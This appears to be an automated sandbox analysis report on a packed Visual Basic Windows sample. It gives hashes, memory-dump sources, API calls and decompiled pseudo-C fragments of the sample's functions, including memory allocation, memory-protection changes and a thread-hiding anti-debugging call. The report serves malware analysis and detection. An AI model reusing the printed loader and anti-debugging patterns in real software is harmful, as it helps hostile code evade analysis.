                          • Instruction ID: 92b45e25df0ebb70a50ea91e592046a2c7d4a3052279f8bb186e836a2dc8b490
                          • Opcode Fuzzy Hash: bc143c691bf093c7ebccba199c306ab7be8e89df1fab39c28874c1b79052ebed
                          • Instruction Fuzzy Hash: CB317ED4A6E703C5F49361B000819316050EED73592B38BBB5733718C2A33E968B368F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 91e33f138806f9fd374a4bb8c39bfb5f557424d2b4533238fbf98676654aaf3e
                          • Instruction ID: cb147bb6cc61b047197b813434174cf4c128319adbd0723c65c6827364c0eefe
                          • Opcode Fuzzy Hash: 91e33f138806f9fd374a4bb8c39bfb5f557424d2b4533238fbf98676654aaf3e
                          • Instruction Fuzzy Hash: D0214DD4A6E707C5F49361B000819315054EEE73561738BBB9B33718C2A63E969B32CF
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 8ac95c6530fe62219c128747c47118d6cfd9bf169f98c4555ed48adecb6f32bc
                          • Instruction ID: c69b1403859733c7cc5d3123be69c0480bce6eeba375f5de3bc5c2b5d97b2e45
                          • Opcode Fuzzy Hash: 8ac95c6530fe62219c128747c47118d6cfd9bf169f98c4555ed48adecb6f32bc
                          • Instruction Fuzzy Hash: 79315CD5A7E707C5F49361B000819316154EEE73561738BBF9B23714C2A23E969B728F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: de3e7cae9c32a2a88d116303178c36f14280665aa5bba7b1ab99c770d22ba0e7
                          • Instruction ID: a6396661349038fbd6d1bb1c1d76b35d292715510b71c8b5717f67cde438a1f9
                          • Opcode Fuzzy Hash: de3e7cae9c32a2a88d116303178c36f14280665aa5bba7b1ab99c770d22ba0e7
                          • Instruction Fuzzy Hash: 18217AD0D2E607C6F95321B000808315455EED73656738BBB9B23728C2A63E969F72CE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 7aff71f9cdc042bed321d719ce63f0e087760c651781f9c84954bb8c31645a56
                          • Instruction ID: c0937b0cff1bb249555b3b0f0c52f623b9a37c7067222e8afb09757a00bd89fb
                          • Opcode Fuzzy Hash: 7aff71f9cdc042bed321d719ce63f0e087760c651781f9c84954bb8c31645a56
                          • Instruction Fuzzy Hash: 8C214BD4A2E607C5F89361B001819315064EEE73551738FBB9B33718C2A63E969B32CF
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 254644590c7491985fb893dc137853faca34093ee44513ee4cfb35dde58dfd4a
                          • Instruction ID: fab38d300d8a960dfe8087095ffeedff7716247deecef09fa22ccfa5180acee5
                          • Opcode Fuzzy Hash: 254644590c7491985fb893dc137853faca34093ee44513ee4cfb35dde58dfd4a
                          • Instruction Fuzzy Hash: AA218CD4A2E607C5F89321B000809316060EED73556738FBB5B23718C2A63EA29B32CF
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 573d26fde16b3af0309e6634f1e13181e4c12f304e61d72f2c2f9f217da8d2f6
                          • Instruction ID: fd4390dcd7bb85f2687ae67deb092a570c23becf98975b9f227acdf89342d9c4
                          • Opcode Fuzzy Hash: 573d26fde16b3af0309e6634f1e13181e4c12f304e61d72f2c2f9f217da8d2f6
                          • Instruction Fuzzy Hash: FA31ADE0A6E607C5F99361B0418193160A0EEE73152738BBF9723714C2A73E965B768F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          APIs
                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,00000000), ref: 021D05F8
                          • LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                            • Part of subcall function 021D5A6C: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,021D5609,00000040,021D0570,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 021D5A87
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                          • String ID:
                          • API String ID: 449006233-0
                          • Opcode ID: 5ae958c3113e0e0aaa7fdbf0c35f4427f06d8ea34d9cb66c872f0b43214b5ccc
                          • Instruction ID: 5b3a61809898503fca3e35e3c6f72e0da70bf03543b48d1ccec2dc3c2ef721c3
                          • Opcode Fuzzy Hash: 5ae958c3113e0e0aaa7fdbf0c35f4427f06d8ea34d9cb66c872f0b43214b5ccc
                          • Instruction Fuzzy Hash: 6C610861984342DEDB318F6885D4BA17B939F17330FD9C2A9CDA64F2D6D3758441C722
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3c15a7b9a87c8160f53269abfe4c8eca20e4b920815d3e0cd1eb82c3f2ebfaae
                          • Instruction ID: 257612eeba9cd1af32ff1aa798f9ebef7aed7ab6fa60b2500ddad2d007db32d7
                          • Opcode Fuzzy Hash: 3c15a7b9a87c8160f53269abfe4c8eca20e4b920815d3e0cd1eb82c3f2ebfaae
                          • Instruction Fuzzy Hash: 5A41E9306C4301EFFB25AE24C894BE973A6FF19354F914116EDAA8B1D1D7B5D8C4CA12
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2059a55964caa1500504178f7ec4321333b4a43cba00d56926b5d3365da83390
                          • Instruction ID: 7e8a2925817025084ee96120e797dd2f1fbaa03c3c5c4cea9696ca233cf9d733
                          • Opcode Fuzzy Hash: 2059a55964caa1500504178f7ec4321333b4a43cba00d56926b5d3365da83390
                          • Instruction Fuzzy Hash: CF31F271BC0615EFCB689A28CC54BD663E9BF05320F554326ECADD3281D720E889CB80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 17c2ee888b86588c30084440f874a25fc694d3b71ddbbb06637507cf0a777cf1
                          • Instruction ID: 1d629c8bae5ec679ff045355b3c9801070278dd7398d1f4f4ebef9fa2add0d67
                          • Opcode Fuzzy Hash: 17c2ee888b86588c30084440f874a25fc694d3b71ddbbb06637507cf0a777cf1
                          • Instruction Fuzzy Hash: EAF08C74345202CFC715EA24C6D4F9473A0EF693B0F5688A1EC85C3662D335EC40C520
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 50f1797a04462ddc6dea509b6ccbca2ec1beaf0b8fdc9b72d0d0851085ebf76c
                          • Instruction ID: c774c3d1e9a88e27358d1c86903a8312c879459471df9d3be9315755b80da27e
                          • Opcode Fuzzy Hash: 50f1797a04462ddc6dea509b6ccbca2ec1beaf0b8fdc9b72d0d0851085ebf76c
                          • Instruction Fuzzy Hash: 68C092B36405808FEF02CE08C886B8073B1FB25E84B4904D4E803CF612E328ED01CF00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bd978d2a180bd48f33f02ed769998f637591f3217dd52bc83d8caa31607e2653
                          • Instruction ID: 53564383bf43054fcb6bc85e7037885d87c04f7f94de5ee9bb9c5ed8a313171f
                          • Opcode Fuzzy Hash: bd978d2a180bd48f33f02ed769998f637591f3217dd52bc83d8caa31607e2653
                          • Instruction Fuzzy Hash: 08B09234221A408FCA41CE08C180E4073A0BB08660B010680E8208BBA1C324E804CA00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 56%
                          			E0040C053(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				signed int _v32;
                          				intOrPtr _v40;
                          				char _v48;
                          				char _v56;
                          				char _v64;
                          				char _v72;
                          				char _v80;
                          				signed int _v100;
                          				signed int _v104;
                          				signed int _v108;
                          				signed int _v112;
                          				long long _v128;
                          				signed int _v132;
                          				signed int* _v136;
                          				signed int _v140;
                          				signed int _v144;
                          				signed char _t61;
                          				void* _t67;
                          				void* _t69;
                          				intOrPtr _t70;
                          				long long _t73;
                          
                          				_t70 = _t69 - 0xc;
                          				 *[fs:0x0] = _t70;
                          				L00401120();
                          				_v16 = _t70;
                          				_v12 = 0x4010f8;
                          				_v8 = 0;
                          				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x78,  *[fs:0x0], 0x401126, _t67);
                          				_v56 = 0x80020004;
                          				_v64 = 0xa;
                          				_v40 = 0x80020004;
                          				_v48 = 0xa;
                          				_push( &_v64);
                          				_t61 =  &_v48;
                          				_push(_t61);
                          				_v56 =  *0x4010f0;
                          				_t73 =  *0x4010e8;
                          				_v64 = _t73;
                          				asm("fld1");
                          				_v72 = _t73;
                          				L004011C8();
                          				L004011CE();
                          				_v128 = _t73;
                          				asm("fchs");
                          				asm("fnstsw ax");
                          				if((_t61 & 0x0000000d) == 0) {
                          					L004011CE();
                          					asm("fcomp qword [ebp-0x7c]");
                          					asm("fnstsw ax");
                          					asm("sahf");
                          					if(__eflags == 0) {
                          						_t17 =  &_v132;
                          						 *_t17 = _v132 & 0x00000000;
                          						__eflags =  *_t17;
                          					} else {
                          						_v132 = 1;
                          					}
                          					_v132 =  ~_v132;
                          					_v100 = __ax;
                          					__eax =  &_v64;
                          					_push( &_v64);
                          					__eax =  &_v48;
                          					_push( &_v48);
                          					_push(2);
                          					L004011C2();
                          					__esp = __esp + 0xc;
                          					__eax = _v100;
                          					__eflags = __eax;
                          					if(__eax != 0) {
                          						__eflags =  *0x40d594;
                          						if( *0x40d594 != 0) {
                          							_v136 = 0x40d594;
                          						} else {
                          							_push(0x40d594);
                          							_push(0x4024a8);
                          							L004011BC();
                          							_v136 = 0x40d594;
                          						}
                          						_v136 =  *_v136;
                          						_v100 =  *_v136;
                          						__eax =  &_v32;
                          						_v100 =  *_v100;
                          						__eax =  *((intOrPtr*)( *_v100 + 0x1c))(_v100,  &_v32);
                          						asm("fclex");
                          						_v104 = __eax;
                          						__eflags = _v104;
                          						if(_v104 >= 0) {
                          							_t37 =  &_v140;
                          							 *_t37 = _v140 & 0x00000000;
                          							__eflags =  *_t37;
                          						} else {
                          							_push(0x1c);
                          							_push(0x402498);
                          							_push(_v100);
                          							_push(_v104);
                          							L004011F2();
                          							_v140 = __eax;
                          						}
                          						__eax = _v32;
                          						_v108 = _v32;
                          						_v72 = 0x80020004;
                          						_v80 = 0xa;
                          						__eax = 0x10;
                          						L00401120();
                          						__esi =  &_v80;
                          						__edi = __esp;
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						_v108 =  *_v108;
                          						__eax =  *((intOrPtr*)( *_v108 + 0x60))(_v108, L"bdmphgm4oKLHkMpKtKuJ5249");
                          						asm("fclex");
                          						_v112 = __eax;
                          						__eflags = _v112;
                          						if(_v112 >= 0) {
                          							_t52 =  &_v144;
                          							 *_t52 = _v144 & 0x00000000;
                          							__eflags =  *_t52;
                          						} else {
                          							_push(0x60);
                          							_push(0x4024b8);
                          							_push(_v108);
                          							_push(_v112);
                          							L004011F2();
                          							_v144 = __eax;
                          						}
                          						__ecx =  &_v32;
                          						L004011B6();
                          					}
                          					asm("wait");
                          					_push(E0040C235);
                          					return __eax;
                          				}
                          				return __imp____vbaFPException();
                          			}

                          APIs
                          • __vbaChkstk.MSVBVM60(?,00401126), ref: 0040C06F
                          • #678.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 0040C0D4
                          • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 0040C0D9
                          • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 0040C0F3
                          • __vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A), ref: 0040C120
                          • __vbaNew2.MSVBVM60(004024A8,0040D594,?,?,00401126), ref: 0040C147
                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402498,0000001C), ref: 0040C194
                          • __vbaChkstk.MSVBVM60(00000000,?,00402498,0000001C), ref: 0040C1BF
                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004024B8,00000060), ref: 0040C1F5
                          • __vbaFreeObj.MSVBVM60(00000000,?,004024B8,00000060), ref: 0040C20C
                          Strings
                          • bdmphgm4oKLHkMpKtKuJ5249, xrefs: 0040C1CD
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: __vba$CheckChkstkFreeHresult$#678ListNew2
                          • String ID: bdmphgm4oKLHkMpKtKuJ5249
                          • API String ID: 1840260717-316254104
                          • Opcode ID: 0a76fd71c2dd6c036da4bca4f363627f585d09351277c41896fa5862236fa63e
                          • Instruction ID: 0f554fd696726ee348e140752fea5efc4d458bc0cc6133c1b91ab8ab7a6ed652
                          • Opcode Fuzzy Hash: 0a76fd71c2dd6c036da4bca4f363627f585d09351277c41896fa5862236fa63e
                          • Instruction Fuzzy Hash: D8515670D40308EFDB04EF95C889B9DBBB9FB08704F10816AE548BB2A1CBB94844DF59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 63%
                          			E0040BD44(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
                          				void* _v3;
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				short _v32;
                          				void* _v48;
                          				struct HWND__* _v68;
                          				signed int _v72;
                          				signed int _v84;
                          				intOrPtr _v397355967;
                          				signed int _t34;
                          				short _t36;
                          				void* _t38;
                          				void* _t45;
                          				void* _t48;
                          				intOrPtr _t49;
                          
                          				_t38 = __ecx;
                          				asm("in al, dx");
                          				_t49 = _t48 - 0xc;
                          				 *[fs:0x0] = _t49;
                          				L00401120();
                          				_v16 = _t49;
                          				_v12 = E004010B0;
                          				_v8 = 0;
                          				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x401126, _t45);
                          				_t34 =  *((intOrPtr*)( *_a4 + 0x58))(_a4,  &_v68);
                          				asm("fclex");
                          				_v72 = _t34;
                          				if(_v72 >= 0) {
                          					_v84 = _v84 & 0x00000000;
                          				} else {
                          					_push(0x58);
                          					_push(0x4020d4);
                          					_push(_a4);
                          					_push(_v72);
                          					L004011F2();
                          					_v84 = _t34;
                          				}
                          				HideCaret(_v68);
                          				L004011EC();
                          				_push(0);
                          				_t36 =  *0x004039FF();
                          				asm("aam 0xa");
                          				 *_t36 =  *_t36 + _t36;
                          				_v397355967 = _v397355967 + _t38;
                          				_v32 = _t36;
                          				L004011E0();
                          				_push(E0040BE01);
                          				return _t36;
                          			}

                          APIs
                          • __vbaChkstk.MSVBVM60(?,00401126), ref: 0040BD60
                          • __vbaHresultCheckObj.MSVBVM60(00000000,004010B0,004020D4,00000058), ref: 0040BDAB
                          • HideCaret.USER32(?), ref: 0040BDBC
                          • __vbaSetSystemError.MSVBVM60(?,00000000,004010B0,004020D4,00000058), ref: 0040BDC1
                          • __vbaFreeVar.MSVBVM60 ref: 0040BDEB
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: __vba$CaretCheckChkstkErrorFreeHideHresultSystem
                          • String ID:
                          • API String ID: 2961917346-0
                          • Opcode ID: 08bba07b99495729eb8cd2fa3badf8b6076510832e11652aa3b3305f6a2ab9f1
                          • Instruction ID: 4b25c979fca95e85091d665f10c397e12c70c7e34684666f5dd652a0ccf7a8f1
                          • Opcode Fuzzy Hash: 08bba07b99495729eb8cd2fa3badf8b6076510832e11652aa3b3305f6a2ab9f1
                          • Instruction Fuzzy Hash: E4113A74900688EFCB01AFA5CC45B9DBBB5FF08745F10806AF541BA1E1C7789A45CB89
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 64%
                          			E0040BD46(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                          				signed int _t34;
                          				short _t36;
                          				void* _t38;
                          				void* _t45;
                          				void* _t46;
                          				void* _t47;
                          				intOrPtr _t48;
                          
                          				_t38 = __ecx;
                          				asm("in al, dx");
                          				_t48 = _t47 - 0xc;
                          				 *[fs:0x0] = _t48;
                          				L00401120();
                          				 *((intOrPtr*)(_t45 - 0xc)) = _t48;
                          				 *((intOrPtr*)(_t45 - 8)) = E004010B0;
                          				 *((intOrPtr*)(_t45 - 4)) = 0;
                          				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t45 + 8)))) + 4))( *((intOrPtr*)(_t45 + 8)), __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x401126);
                          				_t34 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t45 + 8)))) + 0x58))( *((intOrPtr*)(_t45 + 8)), _t45 - 0x40);
                          				asm("fclex");
                          				 *(_t45 - 0x44) = _t34;
                          				if( *(_t45 - 0x44) >= 0) {
                          					 *(_t45 - 0x50) =  *(_t45 - 0x50) & 0x00000000;
                          				} else {
                          					_push(0x58);
                          					_push(0x4020d4);
                          					_push( *((intOrPtr*)(_t45 + 8)));
                          					_push( *(_t45 - 0x44));
                          					L004011F2();
                          					 *(_t45 - 0x50) = _t34;
                          				}
                          				HideCaret( *(_t45 - 0x40));
                          				L004011EC();
                          				_push(0);
                          				_t36 =  *0x004039FF();
                          				_t46 = _t45 + 1;
                          				asm("aam 0xa");
                          				 *_t36 =  *_t36 + _t36;
                          				 *((intOrPtr*)(_t46 - 0x17af2bbb)) =  *((intOrPtr*)(_t46 - 0x17af2bbb)) + _t38;
                          				 *((short*)(_t46 - 0x1c)) = _t36;
                          				L004011E0();
                          				_push(E0040BE01);
                          				return _t36;
                          			}

                          APIs
                          • __vbaChkstk.MSVBVM60(?,00401126), ref: 0040BD60
                          • __vbaHresultCheckObj.MSVBVM60(00000000,004010B0,004020D4,00000058), ref: 0040BDAB
                          • HideCaret.USER32(?), ref: 0040BDBC
                          • __vbaSetSystemError.MSVBVM60(?,00000000,004010B0,004020D4,00000058), ref: 0040BDC1
                          • __vbaFreeVar.MSVBVM60 ref: 0040BDEB
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: __vba$CaretCheckChkstkErrorFreeHideHresultSystem
                          • String ID:
                          • API String ID: 2961917346-0
                          • Opcode ID: f6f670eefe45603b195561760b3c2ecb8247a8c7cb5670fe699c6e1e0cedb25b
                          • Instruction ID: 66d8ca1993ac17da8515e34f646b0e7e8b9bd3e58b8d3ce0fd8b4448664758be
                          • Opcode Fuzzy Hash: f6f670eefe45603b195561760b3c2ecb8247a8c7cb5670fe699c6e1e0cedb25b
                          • Instruction Fuzzy Hash: 25114934900688EFCB01AFA4CC45B9DBFB5EF08744F10806AF641BA1A1C7789A46CB89
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 60%
                          			E0040C261(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				void* _v24;
                          				signed int _v32;
                          				signed int _v40;
                          				signed int _t20;
                          				void* _t28;
                          				intOrPtr _t30;
                          
                          				 *[fs:0x0] = _t30;
                          				L00401120();
                          				_v12 = _t30;
                          				_v8 = 0x401108;
                          				L004011DA();
                          				_t20 =  *((intOrPtr*)( *_a4 + 0x14c))(_a4, 0, __edi, __esi, __ebx, 0x14,  *[fs:0x0], 0x401126, __ecx, __ecx, _t28);
                          				asm("fclex");
                          				_v32 = _t20;
                          				if(_v32 >= 0) {
                          					_v40 = _v40 & 0x00000000;
                          				} else {
                          					_push(0x14c);
                          					_push(0x4020d4);
                          					_push(_a4);
                          					_push(_v32);
                          					L004011F2();
                          					_v40 = _t20;
                          				}
                          				_push(E0040C2E0);
                          				L004011B0();
                          				return _t20;
                          			}












                          APIs
                          • __vbaChkstk.MSVBVM60(?,00401126), ref: 0040C27C
                          • __vbaStrCopy.MSVBVM60(?,?,?,?,00401126), ref: 0040C294
                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004020D4,0000014C,?,?,?,?,00401126), ref: 0040C2C4
                          • __vbaFreeStr.MSVBVM60(0040C2E0,?,?,?,?,?,?,00401126), ref: 0040C2DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: __vba$CheckChkstkCopyFreeHresult
                          • String ID:
                          • API String ID: 3646427762-0
                          • Opcode ID: ca1f4b6d22b76954e45c4986d888b5da7bc4a0ff1b83a9dfdef00745ae885d7c
                          • Instruction ID: e6314aaefe9858c2768dfea9a20980395283ff53a00ce7bf66a0ac0bf510db14
                          • Opcode Fuzzy Hash: ca1f4b6d22b76954e45c4986d888b5da7bc4a0ff1b83a9dfdef00745ae885d7c
                          • Instruction Fuzzy Hash: 6E011A70940209EFCB04DF95C946FAE7BB4EB08754F10416AF6057A5E0C3B95A01DBA8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Executed Functions

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: LibraryLoadMemoryProtectVirtual
                          • String ID: y
                          • API String ID: 3389902171-1128323793
                          • Opcode ID: 448fdd9280b30215ea4c871e371a027e0907eaf51071c245d2699a749c49f1f0
                          • Instruction ID: fe249b39b9de613e6a9982b7ffee02e53aa71dbabee4738e359d1799567d7c4a
                          • Opcode Fuzzy Hash: 448fdd9280b30215ea4c871e371a027e0907eaf51071c245d2699a749c49f1f0
                          • Instruction Fuzzy Hash: 98224A70680702DEEF309E24CD94BE97F92FF52360F648269ED918B2C5E3758885C712
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtSetInformationThread.NTDLL ref: 0056632F
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: InformationThread
                          • String ID:
                          • API String ID: 4046476035-0
                          • Opcode ID: a27ac88b18a0cf68898b2539ebf2e3e7f7d6ac29fc2c2a52ec60417ad535a27f
                          • Instruction ID: 71b9179b4395b31a20eca4bd19b33f05bce20e96238a11421c0da294679136f7
                          • Opcode Fuzzy Hash: a27ac88b18a0cf68898b2539ebf2e3e7f7d6ac29fc2c2a52ec60417ad535a27f
                          • Instruction Fuzzy Hash: BD413931704746CEEB219D34C9A87E96F53BF63324FA45E3AC89287695E37488C5D601
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8e5038dde8e7f07ae646b17e552c37e9d4603d57097b97616dc4954fefa9063b
                          • Instruction ID: dc14c27f647b58a1a9049e478070fb48eba87e6a3b489958b93fac69eea9a8ca
                          • Opcode Fuzzy Hash: 8e5038dde8e7f07ae646b17e552c37e9d4603d57097b97616dc4954fefa9063b
                          • Instruction Fuzzy Hash: 43415831704746CEEB219E34C9687E96F53BF63334FA85E69C94287691E37488C5D602
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtSetInformationThread.NTDLL ref: 0056632F
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: InformationThread
                          • String ID:
                          • API String ID: 4046476035-0
                          • Opcode ID: e4f6d4936681bae7ed82004eb08427368475e654e465bac59e5dd261f05f7652
                          • Instruction ID: ad45bb8017bf94af2bc1523cf091e7bc11bdfa6497222eadc684750e69d846e9
                          • Opcode Fuzzy Hash: e4f6d4936681bae7ed82004eb08427368475e654e465bac59e5dd261f05f7652
                          • Instruction Fuzzy Hash: 6B414730704746CEEB319E34C9687E96F53BF63334FA85E29C95287691E37488C5D602
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtSetInformationThread.NTDLL ref: 0056632F
                          Memory Dump Source
